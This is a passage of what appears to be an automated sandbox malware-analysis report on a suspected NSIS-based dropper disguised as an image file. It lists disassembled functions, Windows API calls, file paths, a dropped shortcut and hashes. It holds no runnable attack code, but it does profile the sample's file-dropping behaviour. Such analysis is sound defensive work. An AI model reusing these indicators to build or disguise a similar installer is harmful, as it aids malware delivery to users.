                                                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                      • String ID: "$"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging$C:\Users\user\Desktop$C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                      • API String ID: 4107622049-519006840
                                                                                      • Opcode ID: c9a6281d6327b5ff8a3063c5cf6d9467bc79e302010f0b26b7a58b08dbd81a83
                                                                                      • Instruction ID: cbe6203d26f901f65e01a216d62163169d989bdc7c49c29356e1850f369634ff
                                                                                      • Opcode Fuzzy Hash: c9a6281d6327b5ff8a3063c5cf6d9467bc79e302010f0b26b7a58b08dbd81a83
                                                                                      • Instruction Fuzzy Hash: 04B119709083516EE711AF745C4DA2B7EACEB86306F04457EF181B61E2C77C9A05CB6E
                                                                                      Function 00404FC7 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 279windowclipboardmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 113 404fc7-404fe2 114 405173-40517a 113->114 115 404fe8-4050b1 GetDlgItem * 3 call 403ec1 call 404727 GetClientRect GetSystemMetrics SendMessageA * 2 113->115 117 4051a4-4051b1 114->117 118 40517c-40519e GetDlgItem CreateThread CloseHandle 114->118 136 4050b3-4050cd SendMessageA * 2 115->136 137 4050cf-4050d2 115->137 120 4051b3-4051b9 117->120 121 4051cf-4051d6 117->121 118->117 123 4051f1-4051fa call 403ef3 120->123 124 4051bb-4051ca ShowWindow * 2 call 403ec1 120->124 125 4051d8-4051de 121->125 126 40522d-405231 121->126 133 4051ff-405203 123->133 124->121 130 4051e0-4051ec call 403e65 125->130 131 405206-405216 ShowWindow 125->131 126->123 128 405233-405236 126->128 128->123 138 405238-40524b SendMessageA 128->138 130->123 134 405226-405228 call 403e65 131->134 135 405218-405221 call 404e89 131->135 134->126 135->134 136->137 142 4050e2-4050f9 call 403e8c 137->142 143 4050d4-4050e0 SendMessageA 137->143 144 405251-405272 CreatePopupMenu call 405b9e AppendMenuA 138->144 145 405345-405347 138->145 152 4050fb-40510f ShowWindow 142->152 153 40512f-405150 GetDlgItem SendMessageA 142->153 143->142 150 405274-405285 GetWindowRect 144->150 151 405287-40528d 144->151 145->133 155 405290-4052a8 TrackPopupMenu 150->155 151->155 156 405111-40511c ShowWindow 152->156 157 40511e 152->157 153->145 154 405156-40516e SendMessageA * 2 153->154 154->145 155->145 159 4052ae-4052c5 155->159 158 405124-40512a call 403ec1 156->158 157->158 158->153 160 4052ca-4052e5 SendMessageA 159->160 160->160 162 4052e7-405307 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 160->162 163 405309-405329 SendMessageA 162->163 163->163 164 40532b-40533f GlobalUnlock SetClipboardData CloseClipboard 163->164 164->145
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405026
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405035
                                                                                      • GetClientRect.USER32(?,?), ref: 00405072
                                                                                      • GetSystemMetrics.USER32(00000015), ref: 0040507A
                                                                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 0040509B
                                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050AC
                                                                                      • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BF
                                                                                      • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050CD
                                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050E0
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405102
                                                                                      • ShowWindow.USER32(?,?), ref: 00405116
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405137
                                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405147
                                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405160
                                                                                      • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040516C
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405044
                                                                                        • Part of subcall function 00403EC1: SendMessageA.USER32(?,?,00000001,00403CF2), ref: 00403ECF
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405189
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004F5B,00000000), ref: 00405197
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0040519E
                                                                                      • ShowWindow.USER32(00000000), ref: 004051C2
                                                                                      • ShowWindow.USER32(0001040C,?), ref: 004051C7
                                                                                      • ShowWindow.USER32(?), ref: 0040520E
                                                                                      • SendMessageA.USER32(0001040C,00001004,00000000,00000000), ref: 00405240
                                                                                      • CreatePopupMenu.USER32 ref: 00405251
                                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405266
                                                                                      • GetWindowRect.USER32(0001040C,?), ref: 00405279
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040529D
                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D8
                                                                                      • OpenClipboard.USER32(00000000), ref: 004052E8
                                                                                      • EmptyClipboard.USER32 ref: 004052EE
                                                                                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F7
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405301
                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405315
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040532E
                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00405339
                                                                                      • CloseClipboard.USER32 ref: 0040533F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: Unnarcotic33 Setup: Installing${
                                                                                      • API String ID: 590372296-2023738800
                                                                                      • Opcode ID: 286028ead75b9e4714836cbfcac6401d1fd5b79628626a0f533f6a43fb1c771d
                                                                                      • Instruction ID: e012edbc7131a32af6433ba0e52cc1c5aadcd187bdbee4d49277f23e00180f18
                                                                                      • Opcode Fuzzy Hash: 286028ead75b9e4714836cbfcac6401d1fd5b79628626a0f533f6a43fb1c771d
                                                                                      • Instruction Fuzzy Hash: EDA17D70900208FFEB119F60DD85AAE7FB9FB44355F00806AFA05BA1A1C7795E41DFA9
                                                                                      Function 00405B9E Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 406 405b9e-405ba9 407 405bab-405bba 406->407 408 405bbc-405bd1 406->408 407->408 409 405dc4-405dc8 408->409 410 405bd7-405be2 408->410 412 405bf4-405bfe 409->412 413 405dce-405dd8 409->413 410->409 411 405be8-405bef 410->411 411->409 412->413 414 405c04-405c0b 412->414 415 405de3-405de4 413->415 416 405dda-405dde call 405b7c 413->416 417 405c11-405c46 414->417 418 405db7 414->418 416->415 420 405d61-405d64 417->420 421 405c4c-405c57 GetVersion 417->421 422 405dc1-405dc3 418->422 423 405db9-405dbf 418->423 426 405d94-405d97 420->426 427 405d66-405d69 420->427 424 405c71 421->424 425 405c59-405c5d 421->425 422->409 423->409 433 405c78-405c7f 424->433 425->424 430 405c5f-405c63 425->430 428 405da5-405db5 lstrlenA 426->428 429 405d99-405da0 call 405b9e 426->429 431 405d79-405d85 call 405b7c 427->431 432 405d6b-405d77 call 405ada 427->432 428->409 429->428 430->424 435 405c65-405c69 430->435 444 405d8a-405d90 431->444 432->444 437 405c81-405c83 433->437 438 405c84-405c86 433->438 435->424 440 405c6b-405c6f 435->440 437->438 442 405c88-405ca3 call 405a63 438->442 443 405cbf-405cc2 438->443 440->433 449 405ca8-405cab 442->449 447 405cd2-405cd5 443->447 448 405cc4-405cd0 GetSystemDirectoryA 443->448 444->428 446 405d92 444->446 450 405d59-405d5f call 405de7 446->450 452 405cd7-405ce5 GetWindowsDirectoryA 447->452 453 405d3f-405d41 447->453 451 405d43-405d46 448->451 454 405cb1-405cba call 405b9e 449->454 455 405d48-405d4c 449->455 450->428 451->450 451->455 452->453 453->451 456 405ce7-405cf1 453->456 454->451 455->450 459 405d4e-405d54 lstrcatA 455->459 461 405cf3-405cf6 456->461 462 405d0b-405d21 SHGetSpecialFolderLocation 456->462 459->450 461->462 464 405cf8-405cff 461->464 465 405d23-405d3a SHGetPathFromIDListA CoTaskMemFree 462->465 466 405d3c 462->466 467 405d07-405d09 464->467 465->451 465->466 466->453 467->451 467->462
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,00404EC1,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000), ref: 00405C4F
                                                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405CCA
                                                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CDD
                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,007904A8), ref: 00405D19
                                                                                      • SHGetPathFromIDListA.SHELL32(007904A8,Call), ref: 00405D27
                                                                                      • CoTaskMemFree.OLE32(007904A8), ref: 00405D32
                                                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D54
                                                                                      • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,00404EC1,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000), ref: 00405DA6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 900638850-3222410400
                                                                                      • Opcode ID: 59a5524139052e59ceb1e97a84fd799dfff15b3e0b3a4db6723d1b868c921830
                                                                                      • Instruction ID: cfbb71564de19aca3b2bc26046a3fc1a075fa9ae2907aa6082c2ad5de6d0bb48
                                                                                      • Opcode Fuzzy Hash: 59a5524139052e59ceb1e97a84fd799dfff15b3e0b3a4db6723d1b868c921830
                                                                                      • Instruction Fuzzy Hash: FF61C131904A05ABEF119B68CC88BBF7BB4DF56314F14813BE501BA2D1C27C5982DF5A
                                                                                      Function 00405459 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 468 405459-40547f call 405717 471 405481-405493 DeleteFileA 468->471 472 405498-40549f 468->472 473 405622-405626 471->473 474 4054a1-4054a3 472->474 475 4054b2-4054c2 call 405b7c 472->475 476 4055d0-4055d5 474->476 477 4054a9-4054ac 474->477 483 4054d1-4054d2 call 405670 475->483 484 4054c4-4054cf lstrcatA 475->484 476->473 479 4055d7-4055da 476->479 477->475 477->476 481 4055e4-4055ec call 405e80 479->481 482 4055dc-4055e2 479->482 481->473 491 4055ee-405602 call 405629 call 405411 481->491 482->473 486 4054d7-4054da 483->486 484->486 489 4054e5-4054eb lstrcatA 486->489 490 4054dc-4054e3 486->490 492 4054f0-40550e lstrlenA FindFirstFileA 489->492 490->489 490->492 507 405604-405607 491->507 508 40561a-40561d call 404e89 491->508 494 405514-40552b call 405654 492->494 495 4055c6-4055ca 492->495 501 405536-405539 494->501 502 40552d-405531 494->502 495->476 498 4055cc 495->498 498->476 505 40553b-405540 501->505 506 40554c-40555a call 405b7c 501->506 502->501 504 405533 502->504 504->501 510 405542-405544 505->510 511 4055a5-4055b7 FindNextFileA 505->511 518 405571-40557c call 405411 506->518 519 40555c-405564 506->519 507->482 513 405609-405618 call 404e89 call 405a30 507->513 508->473 510->506 514 405546-40554a 510->514 511->494 516 4055bd-4055c0 FindClose 511->516 513->473 514->506 514->511 516->495 527 40559d-4055a0 call 404e89 518->527 528 40557e-405581 518->528 519->511 522 405566-40556f call 405459 519->522 522->511 527->511 530 405583-405593 call 404e89 call 405a30 528->530 531 405595-40559b 528->531 530->511 531->511
                                                                                      APIs
                                                                                      • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 00405482
                                                                                      • lstrcatA.KERNEL32(0079FD00,\*.*,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004054CA
                                                                                      • lstrcatA.KERNEL32(?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004054EB
                                                                                      • lstrlenA.KERNEL32(?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004054F1
                                                                                      • FindFirstFileA.KERNELBASE(0079FD00,?,?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 00405502
                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055AF
                                                                                      • FindClose.KERNEL32(00000000), ref: 004055C0
                                                                                      Strings
                                                                                      • \*.*, xrefs: 004054C4
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405467
                                                                                      • "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe", xrefs: 00405459
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                      • API String ID: 2035342205-53564135
                                                                                      • Opcode ID: 9b5da5f192e7fde48b3e860a3ac5a2cc75dd95881ee06f6ed108556e41d4a0c5
                                                                                      • Instruction ID: c955c8b93a0d53af4c9a85723dcc71deb8f5af4d32c19fd1700f1dbf21e431d8
                                                                                      • Opcode Fuzzy Hash: 9b5da5f192e7fde48b3e860a3ac5a2cc75dd95881ee06f6ed108556e41d4a0c5
                                                                                      • Instruction Fuzzy Hash: 9F51AE70800A14BADF216B258C49BBF7A79EB42319F14817BF444B12D2D73C9A81DEAD
                                                                                      Function 00405859 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 747 405859-405863 748 405864-40588f GetTickCount GetTempFileNameA 747->748 749 405891-405893 748->749 750 40589e-4058a0 748->750 749->748 751 405895 749->751 752 405898-40589b 750->752 751->752
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 0040586D
                                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405887
                                                                                      Strings
                                                                                      • nsa, xrefs: 00405864
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040585C, 00405860
                                                                                      • "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe", xrefs: 00405859
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-573509740
                                                                                      • Opcode ID: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                                                                      • Instruction ID: 4aebe10c88a2e36316dbf067ffd0f1b8a4e5ad9d66982a0f7a9d71ca3a6838ad
                                                                                      • Opcode Fuzzy Hash: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                                                                      • Instruction Fuzzy Hash: E3F082377083046BDB109F66DC04B9B7B9CDF95750F14C037FE44DA190D6B499548B59
                                                                                      Function 00402036 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134comCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 753 402036-40206f call 402a07 * 5 call 405696 766 402071-402073 call 402a07 753->766 767 402078-402091 CoCreateInstance 753->767 766->767 769 402171-402178 767->769 770 402097-4020ac 767->770 771 40217a-40217f call 401423 769->771 775 4020b2-4020db 770->775 776 402164-40216f 770->776 777 40289c-4028ab 771->777 778 40266d-402674 771->778 785 4020ea-4020fc 775->785 786 4020dd-4020e7 775->786 776->769 782 402184-402186 776->782 778->777 782->771 782->777 789 402110-40212a 785->789 790 4020fe-40210c 785->790 786->785 793 40215b-40215f 789->793 794 40212c-40214b MultiByteToWideChar 789->794 790->789 793->776 794->793 795 40214d-402154 794->795 796 402159 795->796 796->793
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 00402089
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,C:\Users\user\AppData\Local\jazy.lnk,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 00402143
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging, xrefs: 004020C1
                                                                                      • C:\Users\user\AppData\Local\jazy.lnk, xrefs: 0040212C, 00402136, 00402152
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                                      • String ID: C:\Users\user\AppData\Local\jazy.lnk$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging
                                                                                      • API String ID: 123533781-2336559525
                                                                                      • Opcode ID: 2e1ddb8780e1016394c9569cfde0881147111bc378c8489ba5f4aecf93cc6e5d
                                                                                      • Instruction ID: f40fdd2f837a9ef4581bc193a6a0bea3429b4c51dfd852c6190c3096ceffc06e
                                                                                      • Opcode Fuzzy Hash: 2e1ddb8780e1016394c9569cfde0881147111bc378c8489ba5f4aecf93cc6e5d
                                                                                      • Instruction Fuzzy Hash: 86415F75A00205AFCB00DFA4CD88EAE7BB5EF49314F204169F905EB2D1CA79AD41CB55
                                                                                      Function 00405E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNELBASE(?,007A0548,Grundsprogs.but,0040575A,Grundsprogs.but,Grundsprogs.but,00000000,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410), ref: 00405E8B
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405E97
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
